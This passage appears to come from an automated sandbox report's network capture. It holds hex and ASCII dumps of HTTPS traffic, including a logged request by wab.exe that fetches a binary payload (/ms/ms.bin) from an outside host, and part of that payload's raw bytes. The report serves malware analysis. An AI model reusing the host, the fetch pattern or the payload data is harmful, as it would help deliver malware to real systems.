                                                                                    Data Ascii: /5JyohZUbKZUixrku6QHl3tCMtU+ZwZBxu6bzMb258PH7pvDx+6bw++NARxjVLL82bqM956R6YjHONDfrq46pt39SIC/e92LNAZEqgJVH6ATihowsBN8TJdWtza03J4nEWRE9pi3dnjqoQ/QbbkHSiDvnF5CMebRb6+O9IXBGVLADSv+YY9gGE/sG7Zxykcg96MMv6pcpeR/yGCgAmpnnG43Tbi2thow53LdnkYFWcGyWMt7wnrpHvIeExM52wf
                                                                                    2024-12-19 11:47:58 UTC16384INData Raw: 70 42 6c 5a 59 50 6c 61 76 70 78 44 4c 4d 56 43 38 38 71 6c 6e 71 64 63 47 75 2f 6a 44 4a 4b 7a 78 6f 62 76 31 51 38 58 47 73 66 6a 4a 38 37 5a 33 32 2b 76 35 77 68 4a 39 4c 4f 51 55 5a 2f 46 30 36 67 61 4c 48 78 61 32 4d 56 47 41 64 4b 54 46 39 48 4e 58 30 34 49 6b 76 31 61 61 30 47 2f 32 4a 62 5a 70 33 4f 69 79 56 65 66 43 4e 64 53 38 36 76 78 2f 31 58 67 78 7a 50 48 6e 4f 48 4a 38 55 35 77 71 48 59 76 30 4e 35 34 2b 4d 4e 61 6b 30 36 6b 6f 30 35 2f 5a 6d 66 45 61 6b 47 64 51 77 72 45 51 73 50 4b 6c 66 65 31 63 46 63 5a 56 6e 36 64 47 54 4b 30 62 42 33 48 73 70 58 72 67 58 52 44 7a 55 5a 34 66 75 78 73 49 67 78 33 43 32 42 41 68 45 32 31 51 2b 68 32 45 72 4f 42 45 54 4c 64 7a 43 48 74 77 65 69 48 2b 76 6e 72 79 4f 39 59 37 4d 66 75 6d 38 50 48 37 70 76
                                                                                    Data Ascii: pBlZYPlavpxDLMVC88qlnqdcGu/jDJKzxobv1Q8XGsfjJ87Z32+v5whJ9LOQUZ/F06gaLHxa2MVGAdKTF9HNX04Ikv1aa0G/2JbZp3OiyVefCNdS86vx/1XgxzPHnOHJ8U5wqHYv0N54+MNak06ko05/ZmfEakGdQwrEQsPKlfe1cFcZVn6dGTK0bB3HspXrgXRDzUZ4fuxsIgx3C2BAhE21Q+h2ErOBETLdzCHtweiH+vnryO9Y7Mfum8PH7pv
                                                                                    2024-12-19 11:47:58 UTC16384INData Raw: 79 71 75 66 6c 6f 63 50 52 5a 66 45 75 4e 4e 4d 53 78 53 44 4f 38 77 4a 4f 41 32 66 32 37 4b 33 44 36 66 4d 66 4b 58 67 4c 4c 4e 47 47 57 35 68 51 65 73 61 42 45 6d 69 56 45 6c 4f 2b 51 41 6c 68 75 66 68 72 78 72 52 55 6d 76 4e 78 46 53 51 53 2f 37 2f 32 6e 61 2b 6e 38 44 2f 5a 30 38 67 30 6e 6d 76 73 4b 6a 34 6d 2b 53 4b 4f 32 34 4d 79 4a 62 2b 56 61 66 6c 64 4a 71 59 36 78 39 47 65 4c 32 55 77 76 47 4f 6d 38 50 48 37 70 76 44 78 2b 36 62 2b 71 61 39 6e 48 4f 78 4f 2f 70 41 2b 37 6e 31 2b 63 43 56 37 74 4d 56 72 43 6b 63 77 74 63 65 4e 73 62 75 6d 30 68 43 47 35 72 44 78 2b 45 66 47 64 66 75 6d 35 42 38 2b 74 46 67 4c 6d 39 6f 52 4e 6f 50 35 45 49 30 6a 30 6f 42 6c 32 39 59 36 36 51 38 75 6b 49 45 43 49 31 75 30 4c 77 48 53 69 58 6e 67 56 36 68 31 31 79
                                                                                    Data Ascii: yquflocPRZfEuNNMSxSDO8wJOA2f27K3D6fMfKXgLLNGGW5hQesaBEmiVElO+QAlhufhrxrRUmvNxFSQS/7/2na+n8D/Z08g0nmvsKj4m+SKO24MyJb+VafldJqY6x9GeL2UwvGOm8PH7pvDx+6b+qa9nHOxO/pA+7n1+cCV7tMVrCkcwtceNsbum0hCG5rDx+EfGdfum5B8+tFgLm9oRNoP5EI0j0oBl29Y66Q8ukIECI1u0LwHSiXngV6h11y
                                                                                    2024-12-19 11:47:58 UTC16384INData Raw: 50 44 51 48 7a 4b 30 59 57 50 70 4f 57 34 44 42 78 2b 37 39 51 6a 6b 4f 4d 48 30 38 6d 52 41 67 2f 7a 51 66 45 55 59 59 35 42 2b 69 31 36 49 54 52 68 69 59 61 4f 53 38 47 67 57 36 45 61 6d 30 51 7a 64 74 41 71 33 76 61 45 68 79 39 5a 6e 44 78 34 69 69 45 77 44 74 4c 6a 65 30 71 36 49 43 52 74 31 72 51 4c 48 44 47 76 41 57 56 33 46 70 52 75 31 38 72 42 37 4d 45 6c 59 34 37 35 76 44 52 70 50 54 47 46 7a 75 6d 38 78 44 64 70 76 43 78 31 54 61 55 67 49 2b 47 6a 48 2f 6e 45 64 64 52 68 77 68 4b 4c 44 58 47 6a 6f 32 48 79 4f 78 52 69 7a 61 4e 46 5a 6d 47 7a 2b 6d 37 30 68 49 55 68 47 61 77 38 66 57 62 2f 73 65 4b 5a 67 78 50 55 4e 41 51 72 71 61 76 61 72 48 37 70 52 4f 41 67 35 6b 50 45 62 64 39 4b 57 75 6a 52 72 77 6e 76 34 51 61 30 62 46 51 4b 50 41 41 50 31
                                                                                    Data Ascii: PDQHzK0YWPpOW4DBx+79QjkOMH08mRAg/zQfEUYY5B+i16ITRhiYaOS8GgW6Eam0QzdtAq3vaEhy9ZnDx4iiEwDtLje0q6ICRt1rQLHDGvAWV3FpRu18rB7MElY475vDRpPTGFzum8xDdpvCx1TaUgI+GjH/nEddRhwhKLDXGjo2HyOxRizaNFZmGz+m70hIUhGaw8fWb/seKZgxPUNAQrqavarH7pROAg5kPEbd9KWujRrwnv4Qa0bFQKPAAP1
                                                                                    2024-12-19 11:47:58 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 52 67 38 48 43 73 50 48 37 71 4d 74 51 78 4c 7a 67 6f 79 34 34 6b 63 34 62 2b 61 33 6d 75 43 62 77 38 68 6a 4b 48 4d 34 45 52 72
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARg8HCsPH7qMtQxLzgoy44kc4b+a3muCbw8hjKHM4ERr
                                                                                    2024-12-19 11:47:58 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2024-12-19 11:47:58 UTC16384INData Raw: 50 64 44 4a 79 71 43 75 45 6b 36 6a 37 4a 76 44 6f 64 64 54 53 67 61 2f 45 45 36 6a 37 4a 76 44 54 6d 74 79 77 73 66 75 4d 6d 79 37 53 61 5a 37 62 43 35 32 32 30 59 52 34 35 47 33 31 61 35 62 77 36 38 38 52 68 54 62 34 49 76 39 4d 42 71 2b 73 30 73 71 77 38 66 68 46 4f 6d 57 45 57 54 75 67 32 49 4e 6f 71 46 72 53 35 4e 4d 61 33 4c 43 78 2b 34 66 4e 2f 38 74 45 69 74 4f 63 37 50 42 78 2b 34 67 47 5a 62 64 76 45 4b 36 70 73 30 51 78 2b 36 55 52 31 61 65 6d 38 4e 44 50 68 6f 77 38 4e 41 6f 57 30 59 64 59 63 59 49 6b 78 34 5a 52 69 31 79 56 58 66 54 48 7a 54 47 4e 68 42 65 37 2b 79 62 77 30 35 62 42 73 4c 48 37 68 49 46 6b 57 55 75 58 73 62 75 6d 2f 73 67 75 53 51 65 6e 59 6d 43 51 44 6a 72 6c 45 65 57 4a 4a 6e 44 6d 47 64 7a 53 6c 66 71 6d 73 50 48 5a 77 62
                                                                                    Data Ascii: PdDJyqCuEk6j7JvDoddTSga/EE6j7JvDTmtywsfuMmy7SaZ7bC5220YR45G31a5bw688RhTb4Iv9MBq+s0sqw8fhFOmWEWTug2INoqFrS5NMa3LCx+4fN/8tEitOc7PBx+4gGZbdvEK6ps0Qx+6UR1aem8NDPhow8NAoW0YdYcYIkx4ZRi1yVXfTHzTGNhBe7+ybw05bBsLH7hIFkWUuXsbum/sguSQenYmCQDjrlEeWJJnDmGdzSlfqmsPHZwb
                                                                                    2024-12-19 11:47:58 UTC16384INData Raw: 2f 44 58 53 6d 72 64 6c 66 7a 56 51 77 64 2b 64 6e 66 78 38 6e 76 4e 71 32 6d 4b 73 52 68 66 73 7a 4a 56 6b 64 4d 66 6d 6d 38 4d 34 57 35 50 43 78 2b 35 58 30 45 57 72 61 44 48 77 57 44 74 6c 2f 53 69 4c 77 73 41 37 2b 31 6b 63 76 4f 54 4a 4c 76 70 48 2b 43 77 52 37 76 38 76 55 67 48 42 78 79 4c 36 6f 42 6b 43 48 54 31 4f 32 2f 62 44 57 70 69 6f 43 57 45 70 75 70 4b 4b 77 44 6e 5a 70 73 46 4b 53 61 62 4b 34 53 4c 41 2b 30 73 6f 4a 76 55 79 75 56 64 65 45 6b 62 6a 37 4a 76 44 66 31 35 63 68 47 63 69 30 32 76 64 79 59 67 74 64 70 65 62 56 47 31 45 6a 69 37 79 4c 6e 4b 58 77 4e 75 65 35 52 37 34 72 71 48 50 4a 4f 71 56 65 66 41 35 67 33 46 76 62 59 43 46 43 66 56 43 41 64 38 2b 66 39 4a 76 62 55 39 38 75 59 52 43 41 52 42 5a 44 38 6d 35 42 30 6f 67 35 36 78
                                                                                    Data Ascii: /DXSmrdlfzVQwd+dnfx8nvNq2mKsRhfszJVkdMfmm8M4W5PCx+5X0EWraDHwWDtl/SiLwsA7+1kcvOTJLvpH+CwR7v8vUgHBxyL6oBkCHT1O2/bDWpioCWEpupKKwDnZpsFKSabK4SLA+0soJvUyuVdeEkbj7JvDf15chGci02vdyYgtdpebVG1Eji7yLnKXwNue5R74rqHPJOqVefA5g3FvbYCFCfVCAd8+f9JvbU98uYRCARBZD8m5B0og56x
                                                                                    2024-12-19 11:47:58 UTC16384INData Raw: 75 30 56 79 42 51 73 67 34 73 37 47 55 6d 49 30 33 30 64 72 55 52 4e 46 51 31 33 49 62 68 4a 65 32 75 79 62 77 77 73 4c 61 73 72 30 57 45 77 74 76 34 68 59 6e 78 6e 55 65 34 67 67 56 76 36 76 6b 42 5a 7a 59 56 73 32 51 73 42 7a 39 4e 78 65 54 4c 4b 2f 79 30 51 56 6a 30 68 61 38 35 6e 44 78 2b 45 55 54 4d 50 75 6d 30 70 53 68 35 6e 44 78 31 52 6b 49 62 78 63 56 37 38 73 4d 56 5a 7a 76 58 58 4b 75 78 39 65 30 2b 68 34 6d 30 52 31 4b 47 50 34 42 39 45 39 37 64 71 47 45 52 67 43 4f 42 35 42 37 5a 49 62 69 32 4f 58 75 64 6c 48 35 72 47 59 54 6a 4f 4a 36 70 42 38 4f 42 66 36 63 57 39 6f 4a 30 65 54 7a 6b 49 30 2b 48 37 39 66 47 39 6f 58 70 55 52 34 6b 49 45 71 64 36 35 47 62 6b 48 53 69 44 6e 68 46 36 68 31 31 4b 39 32 64 75 5a 37 47 59 66 63 31 56 6e 59 71 67
                                                                                    Data Ascii: u0VyBQsg4s7GUmI030drURNFQ13IbhJe2uybwwsLasr0WEwtv4hYnxnUe4ggVv6vkBZzYVs2QsBz9NxeTLK/y0QVj0ha85nDx+EUTMPum0pSh5nDx1RkIbxcV78sMVZzvXXKux9e0+h4m0R1KGP4B9E97dqGERgCOB5B7ZIbi2OXudlH5rGYTjOJ6pB8OBf6cW9oJ0eTzkI0+H79fG9oXpUR4kIEqd65GbkHSiDnhF6h11K92duZ7GYfc1VnYqg


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.549771103.120.177.1504432780C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-19 11:48:31 UTC181OUTGET /ms/ms.bin HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                    Host: www.royalengineeringllc.com
                                                                                    Cache-Control: no-cache
                                                                                    2024-12-19 11:48:32 UTC223INHTTP/1.1 200 OK
                                                                                    Date: Thu, 19 Dec 2024 11:48:30 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Thu, 25 Jan 2024 11:51:24 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 585792
                                                                                    Connection: close
                                                                                    Content-Type: application/octet-stream
                                                                                    2024-12-19 11:48:32 UTC7969INData Raw: ce 01 2f ff e2 e6 32 e2 80 ba 1e f1 64 76 d6 e1 39 82 cd 6c 01 44 c8 d6 f4 73 2f 51 24 0c c5 a9 67 0d 83 fa e2 c5 50 2a 4d 5e 89 78 8b 98 d6 c6 d1 f0 b1 b3 5a a5 e3 43 08 f5 e8 5a de 5c 6e ae 9c bb c3 14 35 12 c7 67 a1 95 db e6 95 21 df f7 ac 21 39 8f 16 ad af 09 74 71 46 41 7c d3 e5 4d ee fe 67 ca 30 57 75 ed 3b 37 82 02 cd 1d fd 41 df 10 af ae 99 59 7e 2f 2f a9 d3 b8 fe 77 9c 26 c2 99 8f 17 cd a6 e1 ac ad 34 dc a7 0d 41 c6 20 87 89 fc 58 42 d9 7d 4c 73 9c d0 ba 9b 05 65 d7 a4 6a a8 37 74 5a d9 87 ec fe 8b 14 51 5f f4 9d ce 77 bd 8f b5 1a 47 5a 45 ce 97 77 6c 85 5b a3 c2 c6 98 0b ae 47 42 df d1 86 5c 5f 3a 2b 0a 3e fe 82 b1 07 98 4b 8e 7e 8b d5 ba a2 18 a0 0e 0a 14 c7 77 e5 ec 6c b4 92 8b 57 cd 14 18 b4 0a 6a 9d 76 cb 20 0e 5f 08 dc 2d d4 bf fa 0f af 33
                                                                                    Data Ascii: /2dv9lDs/Q$gP*M^xZCZ\n5g!!9tqFA|Mg0Wu;7AY~//w&4A XB}Lsej7tZQ_wGZEwl[GB\_:+>K~wlWjv _-3
                                                                                    2024-12-19 11:48:32 UTC8000INData Raw: aa 7e a6 60 ca bf 57 0d be 7b 58 d3 10 19 ef 8f 2a 05 40 8d 0f d0 ae 4b 89 8a 5f 6c 51 41 a7 8b a4 ca 63 31 8b b3 f4 ed b3 8b 8f bb 52 b6 16 ba e1 f7 b8 c4 32 77 10 24 45 ab 94 3e d6 c4 d4 77 38 eb a7 58 40 07 98 85 48 0c ce ee ee b4 2f 69 7a e6 f7 97 eb 2b 36 fd 3e 64 44 6a 30 39 f2 cb 37 07 8e 25 da 54 ac 80 0d 32 f3 48 99 df 8f df 4b 61 08 6f dc 6d f4 60 cf 2b 7d 45 a2 4c 61 79 b6 e2 42 73 ea 8e 39 1a bd c2 cc 00 65 72 7e 3f 7c 00 41 be dd e3 4d 7d aa 5a ff 1f e5 8d 3c 92 03 e6 7a 7d e1 80 42 71 7f 1d 81 18 af 70 4d 68 b2 fd a8 dd df 11 c2 6a 48 fc d9 e9 0a b9 25 50 64 b8 b8 4e 82 6c 6c 4b 2d bd 2c 4a 04 3d 97 47 a0 03 a8 84 de 75 a4 54 e5 da 5d 10 b8 e8 10 08 5b d5 dc 02 4c b0 2d dd d1 6d a5 81 81 36 f9 31 b1 df 1d 6c 45 19 f5 98 5e 1c f4 8b e9 c5 be
                                                                                    Data Ascii: ~`W{X*@K_lQAc1R2w$E>w8X@H/iz+6>dDj097%T2HKaom`+}ELayBs9er~?|AM}Z<z}BqpMhjH%PdNllK-,J=GuT][L-m61lE^
                                                                                    2024-12-19 11:48:32 UTC8000INData Raw: ed 1d ab 71 06 1e f4 9d ff fb 8f 7b aa 84 32 c2 68 61 c5 71 ab f6 24 cf ee 63 ee a7 0b fe a3 7c 75 b7 17 19 0e ab 5a 1e a0 64 ab ab 1a 8d ff 86 4c 9c b3 dd 3b 35 a1 95 47 f1 ec 25 3a 44 6a ba 10 a3 a5 6f fb 8a 34 b3 0d 28 1d a0 3d 51 23 1e 6c e0 ac 9a b7 a9 db df 21 59 db f8 d8 b4 63 ec 63 74 10 7f b6 1b 8d 91 06 82 54 06 6e be ca 2e 93 ca 3c a1 6a f5 48 05 4a 1d 66 a9 87 75 b2 8c bd a3 21 80 2b c9 ca ff 79 99 0d c3 8d 64 48 cf 5f 6e d4 fb 2c 9a a6 c0 8b bf 2e d2 03 61 0d 96 df eb 7c 48 b3 b6 7e 16 76 2c 87 44 e1 99 05 d8 0c 81 f3 c3 76 57 cb ab 9c 4f db 43 03 b3 b0 3c 7b 73 33 6b 47 70 4a 08 0e 92 c2 3c 25 78 e7 a6 5f 0a f7 7a 6c d7 cc 65 96 bc 87 b9 24 f6 b1 ac 4d c8 c7 e3 d5 56 c0 85 23 1e 3d 46 2b fa d6 18 ac 07 cc d7 a7 21 cf a2 e5 d5 69 ae dd 1f 7c
                                                                                    Data Ascii: q{2haq$c|uZdL;5G%:Djo4(=Q#l!YcctTn.<jHJfu!+ydH_n,.a|H~v,DvWOC<{s3kGpJ<%x_zle$MV#=F+!i|
                                                                                    2024-12-19 11:48:32 UTC8000INData Raw: 2b 2f 4a 1d f1 06 10 9a ef e0 8f 9c 50 d3 1f 46 32 e2 2e 89 8d ea 34 f8 3f d2 7f f5 0e 74 bb 89 05 cb 7e 54 fe 7c c5 44 9f 5a b5 0a 82 bf fe 0e f4 4c e0 98 16 c3 8b 18 25 9a c5 7a 16 22 f7 7b c3 a8 ff 39 70 2d b6 1d fb af 5b 88 5b f4 8f a2 52 eb 20 f6 b6 79 78 76 6f 24 d3 73 42 17 1f ae ce 99 de be e3 5b 9e db 3f e9 1a a0 fc 66 44 f5 d5 86 47 74 6b fa d6 7e 75 0a 55 5b f8 c3 15 4a cc fc 8e 7c 18 e8 a1 7c cd 70 9e 29 a1 27 76 6e 72 b9 b8 21 55 03 08 a3 36 5b b0 cf 37 a6 f4 70 48 98 53 48 e9 91 24 29 8e 7a e1 5c cf 2c 0a 10 cb 30 1c 39 f2 8b 96 ee 3a cb a1 75 71 4a 68 18 26 85 78 b3 b4 32 f7 22 5c 80 98 c3 36 39 62 ac 96 4e 8f 3a ee 34 14 ab 66 e2 06 fa d3 58 24 23 4c 9f bf ce 59 46 16 5b 4b 01 00 2e 2c af 38 93 b3 fa df d7 33 38 38 b7 8f 21 46 f5 ef 35 8f
                                                                                    Data Ascii: +/JPF2.4?t~T|DZL%z"{9p-[[R yxvo$sB[?fDGtk~uU[J||p)'vnr!U6[7pHSH$)z\,09:uqJh&x2"\69bN:4fX$#LYF[K.,8388!F5
                                                                                    2024-12-19 11:48:32 UTC8000INData Raw: 08 25 a1 7f e6 aa ce 3c 5d 44 8b 23 84 2c b0 70 b6 d4 25 b6 5d ec b3 35 e9 49 aa 77 8c 57 c2 1f ab 6e 26 f5 5e 8a fb 74 94 54 4c 5d 66 b3 4b 68 75 4b 0b 61 51 13 1c 71 c3 be c8 a8 91 5e 0e 35 45 0e 94 7f 7d 9a 48 49 f7 53 2a ef 79 dd 3f 2b da 67 e3 a3 64 17 62 55 29 89 6a ec ee b1 d3 a8 45 32 e8 d4 bf b8 ee ee e8 ee d1 bf b0 b1 ce b7 50 fe 22 06 d4 cc 61 72 21 6e f8 02 26 4e 09 2b 29 a9 08 8b 10 de 39 c8 23 c2 89 76 e4 93 28 f2 68 a1 cb 42 60 38 3f b4 90 85 31 00 6b 63 42 c3 ca 0f 13 11 aa 49 91 1c 18 27 2f 38 f0 8e 33 f8 c4 6f da c1 44 6a b8 00 9a 0e f9 d7 5d b5 bd b6 a8 14 31 e5 0b d8 51 be 85 97 04 35 26 c0 f7 65 e0 ea 4d 93 8f 22 a7 d0 a4 db e6 62 c1 9d 60 c8 2e c5 be bb f0 2b a5 2b fa db a4 9a 66 01 f5 70 70 81 76 0d fa 93 4e f1 0a 94 59 3f 49 96 e4
                                                                                    Data Ascii: %<]D#,p%]5IwWn&^tTL]fKhuKaQq^5E}HIS*y?+gdbU)jE2P"ar!n&N+)9#v(hB`8?1kcBI'/83oDj]1Q5&eM"b`.++fppvNY?I
                                                                                    2024-12-19 11:48:32 UTC8000INData Raw: 80 fd 7e 2d ff e4 36 3a 00 74 57 63 ea 3e cf d5 56 f1 48 32 5d b6 63 ed 62 37 bb d0 a0 6c ae 31 3a 1d 31 ae da 51 2c 9c e5 8a e2 12 95 65 5c bc 38 0d 5b 7a c9 39 6c c2 e6 1b 56 e3 59 58 87 f1 2f 42 c4 f6 66 a8 c9 5d d7 c0 fc 49 10 53 2b e6 49 21 2f b2 39 05 91 5c 9f a0 44 d8 9d ce 1d ac 0d 76 9c 84 d5 44 b8 e5 b5 c4 e5 39 12 0f bc b0 c7 af c2 f3 d2 dd 8d 8c 8b 1c 71 52 21 bb e4 69 1b a1 7f e0 0a 08 f5 5c 34 91 67 44 c0 ba 32 75 10 e2 08 ff 21 be f3 d5 a9 bf 2d 15 24 42 10 68 09 a6 c2 87 5b e8 d3 51 d3 49 ac 19 fb 4d 6d 36 30 19 de d3 2e de b4 7c 5b ce ed f5 e8 e1 af d4 41 51 f5 19 1e 8a 8a 6e 53 6e 2a 4a 15 ab 2a 77 82 e5 e0 00 c8 d0 cf 6c 99 af 66 2a 5b 52 c2 c4 35 ee 23 76 a2 cd 8b e4 8c 27 fe 4f 2e 34 d2 5c d9 e7 4e 36 94 15 f3 26 2d 3c 10 a7 d4 88 8c
                                                                                    Data Ascii: ~-6:tWc>VH2]cb7l1:1Q,e\8[z9lVYX/Bf]IS+I!/9\DvD9qR!i\4gD2u!-$Bh[QIMm60.|[AQnSn*J*wlf*[R5#v'O.4\N6&-<
                                                                                    2024-12-19 11:48:32 UTC8000INData Raw: 45 90 9e 41 d4 03 e5 6d 35 03 64 39 5b cb 82 b4 57 24 ef 84 93 7f 6d b2 ab 1e bb 77 1f 91 e1 64 85 cd 2c 0e fb a8 82 f8 23 3c 85 6d 17 f2 34 88 ab f2 80 56 d8 82 72 07 81 a9 d4 f6 c5 96 5a 99 db 2e ae 51 7a 9d 61 95 ac 16 54 97 16 b9 8c 20 3b 9e e3 fd 5a f3 7a 25 21 ce ea b4 f4 9a 68 1f 1d a5 ce b7 86 b8 dc 63 ec 33 ce 43 98 a9 32 88 a0 e8 48 31 da 0e b0 41 dd 73 2a d1 39 ee 3b 4f 72 1b a4 1b 64 02 5f b9 66 de 31 d0 ad 83 c3 f5 36 09 30 63 89 30 a5 34 d5 ea 5b fc cb 7f b8 7d f7 47 ea 23 82 04 32 9b 8d 24 13 3a 33 02 db 8b 28 82 d7 0e dc 62 2f 4d 3e 77 26 c8 62 4f b7 f5 28 c4 73 40 62 73 5e 71 67 29 c0 82 73 0e a7 b0 e8 95 6d 55 d0 e6 b6 49 2f 31 8e 8e 5f bd 6a 57 81 5e ae 83 89 10 e4 f0 f7 d7 89 5f 08 ba e7 19 ed 0e 57 74 5a 7d e7 58 d8 fe 36 1c a0 65 c2
                                                                                    Data Ascii: EAm5d9[W$mwd,#<m4VrZ.QzaT ;Zz%!hc3C2H1As*9;Ord_f160c04[}G#2$:3(b/M>w&bO(s@bs^qg)smUI/1_jW^_WtZ}X6e
                                                                                    2024-12-19 11:48:32 UTC8000INData Raw: a2 e7 e7 23 cf e0 00 f0 fb 3d f4 54 3f 9e 14 18 7b 09 47 01 c2 95 05 1a ae 29 46 85 98 ab db 3a f2 46 53 1a 54 8f 99 9e a1 d0 a7 01 ec e5 45 84 24 10 7c be 12 02 10 36 e3 10 a1 47 70 81 62 39 65 f4 3e ea dd a2 e5 20 49 ec bd 9c cd e1 05 fc 68 85 04 e6 d3 d3 7f 4b c1 9a 94 94 04 a5 77 3b 7f 05 51 19 67 0e 41 b2 81 ad 7c 24 2d af f0 68 55 29 a0 b0 f0 5f 81 62 b4 d5 b3 bd 8e 5f e5 48 d5 5e ff 11 cc b2 0c 37 79 f7 7d 9e f8 ed 4b 55 e6 bf 56 42 fe bd 11 ee de b1 f7 15 55 86 5d 87 d6 fd 4a 3b 87 e8 bc e3 b3 48 ef 0b f3 39 ef a2 f0 84 1a 5a 07 91 af 05 18 e4 12 2b c0 d8 8c dc 26 69 98 14 55 69 f2 be 14 a0 4f 94 29 8d 2c fd 6b e7 2b 71 ff 2c e7 e4 a9 0f b2 f1 e3 ed 98 ed 49 93 b5 d7 dd d0 e5 ef 3a 59 c6 ae 3b d7 8e e5 8c 47 eb 20 57 31 46 9e b6 d5 18 76 f9 d1 18
                                                                                    Data Ascii: #=T?{G)F:FSTE$|6Gpb9e> IhKw;QgA|$-hU)_b_H^7y}KUVBU]J;H9Z+&iUiO),k+q,I:Y;G W1Fv
                                                                                    2024-12-19 11:48:32 UTC8000INData Raw: d2 e7 12 1d 5a 3f 2c 69 5a fc 32 67 15 52 e8 96 be 4d e9 02 6b 9b 8e f1 f7 66 5b 60 92 48 ee fb a8 0c 20 3d 5e 1a 1a 7a 8c fd ea f2 fc 47 59 0e ee 5a 55 5c 88 e1 cd e3 c1 24 9e 54 83 ad 20 e0 db 96 47 16 3e 74 71 45 c3 53 7c 43 5a 4f 7f f4 2b d6 92 de ad d4 88 16 b1 dc f3 ff 27 f9 c8 0d 58 a6 0b 9f a3 b9 51 59 59 5f 0c 74 23 cd 83 8e cf 71 0a c9 c8 31 b0 4e 78 07 1d 60 27 ab 64 60 24 fc c6 c9 e6 7f f2 41 0f b0 93 fb 11 d0 89 9f ba 05 c2 a6 94 40 29 fe da 0b 22 5d 2c 2b 19 23 44 9f 7f 58 a8 5c 86 7a d8 e5 c2 88 e4 05 e9 20 e7 38 7e c5 cf 79 1e 71 af c0 c0 77 82 b6 fd ef 7e d9 d1 95 05 20 e7 6f d4 97 de 0e 24 c2 1e f7 a2 d0 b8 d3 d3 3a 7e b2 4a 14 9b c6 82 b2 70 fe 13 cc fc 61 08 16 f2 15 ac 61 14 69 2f f0 f5 50 eb 63 a2 d5 9d 42 fc b4 d5 b3 1d 48 29 d7 5f
                                                                                    Data Ascii: Z?,iZ2gRMkf[`H =^zGYZU\$T G>tqES|CZO+'XQYY_t#q1Nx`'d`$A@)"],+#DX\z 8~yqw~ o$:~Jpaai/PcBH)_
                                                                                    2024-12-19 11:48:32 UTC8000INData Raw: 8b 97 b1 71 32 55 bc 40 42 77 57 e1 06 ea 53 e9 ee f2 2d e3 0b 8c f9 37 1e 40 f1 bf f8 05 69 39 2b 69 37 c7 99 d2 e1 83 77 0e e6 a6 68 2d d8 2c b6 79 a4 8a e7 a7 c0 fa b2 80 9b 14 b5 df 4a 2b cc 20 dc d1 7a 08 9f fd 1b b4 08 33 27 d1 e1 53 14 36 12 c7 67 a5 95 db e6 6a de df f7 14 21 39 8f 16 ad af 09 34 71 46 41 7c d3 e5 4d ee fe 67 ca 30 57 75 ed 3b 37 82 02 cd 1d fd 41 df 10 af ae 99 59 7e 2f 2f a9 d3 b8 16 77 9c 26 cc 86 35 19 cd 12 e8 61 8c 8c dd eb c0 60 92 48 ee fa dc 28 30 b6 1a 3e 12 f1 f0 d9 fa 6b 0b b8 d0 4a ca 52 54 28 ac e9 cc 97 e5 34 15 10 a7 bd a3 18 d9 ea 9b 17 4a 50 61 ce 97 77 6c 85 5b a3 b9 f0 1a 9d 91 10 ae 1a ee d1 b0 9a 05 7c e6 fb ae ca 59 c2 a5 1c 62 bb 37 9e 58 67 24 f7 e2 cf 44 8f 91 20 d8 3b 58 57 77 0f 7c d1 2c e3 e6 af a2 21
